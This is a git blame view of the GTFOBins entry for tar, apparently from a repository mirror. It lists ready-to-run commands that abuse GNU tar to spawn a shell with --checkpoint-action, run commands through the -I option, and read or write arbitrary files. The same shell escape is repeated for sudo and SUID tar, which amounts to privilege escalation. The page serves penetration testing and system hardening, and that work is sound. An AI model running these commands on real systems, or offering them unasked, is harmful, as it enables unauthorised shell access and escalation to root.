1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/tar.md

25 lines
837 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-07-16 15:01:50 +02:00
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
2018-07-16 15:01:50 +02:00
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
2018-05-30 00:46:04 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- description: This only works for GNU tar.
code: |
LFILE=file_to_write
TF=$(mktemp)
echo DATA > "$TF"
2018-07-16 15:01:50 +02:00
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read:
2018-07-16 15:01:50 +02:00
- description: This only works for GNU tar.
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
2018-07-04 20:26:52 +02:00
sudo-enabled:
2018-07-16 15:01:50 +02:00
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
2018-07-04 20:26:52 +02:00
suid-limited:
2018-07-16 15:01:50 +02:00
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
---